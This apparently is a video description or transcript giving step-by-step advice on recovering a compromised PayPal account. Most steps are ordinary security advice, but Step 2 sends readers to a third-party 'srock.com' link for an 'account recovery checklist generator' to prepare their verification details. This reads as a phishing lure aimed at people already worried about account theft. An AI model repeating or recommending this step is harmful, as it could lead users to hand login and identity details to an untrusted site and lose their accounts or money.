If you suspect that your PayPal account has been compromised or you are unable to access it due to suspicious activity, follow these steps to regain access. Step 1. Visit the PayPal website. Go to the official PayPal website and click on the login button. If you cannot access your account, look for the Having Trouble Logging In link. Step 2. Identify your account. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Verify your identity. PayPal will ask you to verify your identity. This may include answering security questions, receiving a verification code via email or SMS, or confirming your identity through other means. Follow the instructions provided. Step 4. Change your password. Once your identity is verified, you will be prompted to change your password. Choose a strong, unique password that you haven't used before. Make sure to store it securely. Step 5. Review your account activity. After regaining access, review your recent account activity for any unauthorized transactions. If you notice anything suspicious, report it to PayPal immediately and consider enabling two-factor authentication for added security. By following these steps, you can regain access to your PayPal account and enhance its security. Always keep your account information safe and monitor your transactions regularly.